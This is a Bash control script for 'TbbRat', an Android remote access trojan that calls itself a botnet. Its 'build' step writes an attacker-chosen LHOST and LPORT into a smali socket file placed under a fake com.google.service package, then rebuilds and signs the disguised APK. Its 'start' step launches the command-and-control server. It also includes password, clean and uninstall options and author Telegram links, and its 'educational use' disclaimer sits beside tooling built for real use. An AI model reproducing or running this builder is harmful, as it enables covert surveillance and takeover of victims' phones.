#!/bin/bash
# made your dade ArMaN (PrInCe)

#############################################################
# Colors
#############################################################
clear='\033[0m'
IRed='\033[0;91m'         # Red
IGreen='\033[0;92m'       # Green
IBlue='\033[0;94m'        # Blue
IPurple='\033[0;95m'      # Purple
ICyan='\033[0;96m'        # Cyan


#############################################################
# Start
#############################################################
if [ "$1" == "start" ]
then
	cd $PREFIX/share/TbbRat/server
	printf "${IGreen}    [✔] TbbRat Started [ http://localhost:22533 ]  \n" 
	node index.js -s
#############################################################
# Build
#############################################################
elif [ "$1" == "build" ]
then
	smaliFile="smali_classes3/com/google/service/IOSocket.smali"
	if [ -d $PREFIX/share/TbbRat ]; then
		appPath="$PREFIX/share/TbbRat/server/PrInCe/Tbb/Rat/blank"
	fi
	printf "${IBlue}"
	read -p "    [👽] 𝗟𝗛𝗢𝗦𝗧 🛑" host
	read -p "    [👽] 𝗟𝗣𝗢𝗥𝗧 🛑" port
	sed -i "s#http.*#http://$host:$port?model=\"#" $appPath/$smaliFile
	apkmod -R -i "$appPath" -o $PREFIX/share/TbbRat/TBB_BLANK.apk
	printf "${IBlue}    [✔] Apk Build Successful\n" 
	cd $PREFIX/share/TbbRat
	    rm TBB_BLANK.apk
	    mv TBB_BLANK_signed.apk TBB_BLANK.apk
        mv TBB_BLANK.apk /data/data/com.termux/files/home/storage/shared
        rm TBB_BLANK_signed.apk.idsig
#############################################################
# Clean
#############################################################
elif [ "$1" == "clean" ]
then

		rm $PREFIX/share/TbbRat/server/maindb.json
		cd $PREFIX/share/TbbRat/server/PrInCe
		cp maindb.json /data/data/com.termux/files/usr/share/TbbRat/server 

	printf " ${IGreen}   [✔] Clean Successful \n" 

#############################################################
# Option
#############################################################
elif [ "$1" == "-o" ]
then
	printf " ${IGreen}
[•]━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[•]
[•] AUTHOR    : ARMAN X ALAMIN
[•] FACEBOOK  : TEAM BLACK BERRY
[•] GITHUB    : TeamBlackBerry
[•] TOOL      : TBB BOT-NET
[•]━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[•] \n"
printf " ${IBlue}
♈♈ OPTIONS ♈♈\n
⭕ tbbrat build\n
⭕ tbbrat password\n
⭕ tbbrat start\n
⭕ tbbrat clean\n
⭕ tbbrat about\n
⭕ tbbrat uninstall \n
⭕ tbbrat admin\n
⭕ join our telegram \n"


############################################################
# Password
############################################################
elif [ "$1" == "password" ]
then
	if [ -e $PREFIX/share/TbbRat/server/maindb.json ]
	then
		printf " ${IGreen}"
		read -p "   [👽] 𝗡𝗘𝗪 𝗣𝗔𝗦𝗦𝗪𝗢𝗥𝗗 🛑" pas
		pass=$(echo -n $pas | md5sum | awk '{print $1}')
		sed -i "s#\"password\": \"\"#\"password\": \"$pass\"#g" $PREFIX/share/TbbRat/server/maindb.json
		printf " ${IGreen}   [✔] Password Updated\n" 
	else
		printf " ${IRed} [-] Error please contact admin for fix it \n" 
fi

###############################################################
# Uninstall
###############################################################
elif [ "$1" == "uninstall" ]
then
	cd
    printf " ${IRed} Uninstalling TbbRat Please Wait........\n" 
    rm $PREFIX/bin/tbbrat
    rm -rf $PREFIX/share/TbbRat
    termux-open-url https://t.me/teamblackberry
    printf " ${IGreen} TbbRat Uninstall Successful\n" 
    


#############################################################
# About
#############################################################

elif [ "$1" == "about" ]
then
	cd
	printf " ${IRed}                ❗❗𝗗𝗜𝗦𝗖𝗟𝗔𝗜𝗠𝗘𝗥❗❗\n" 
	printf " ${IBlue}  ArMaN (PrInCe) Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool
TbbRat is built for both Educational and Internal use ONLY \n" 
printf " ${IGreen}          THIS TOOL MADE MY ARMAN (PrInCe)
 \n"            
 printf " ${IRed} Tool Author https://t.me/teamblackberry
CEO: https://t.me/TBBALAMIN007
Admin list :
Admin1: https://t.me/A_R_M_A_N_HUSSEN
Admin2:https://t.me/TEAM_HBS
 \n"     
	printf " ${IPurple}             Made && ❤️ By Arman (𝐏𝐫𝐈𝐧𝐂𝐞)\n" 
printf " ${IGreen}                   [✓]𝗦𝘂𝗽𝗽𝗼𝗿𝘁 𝗨𝘀[✓]\n" 
fi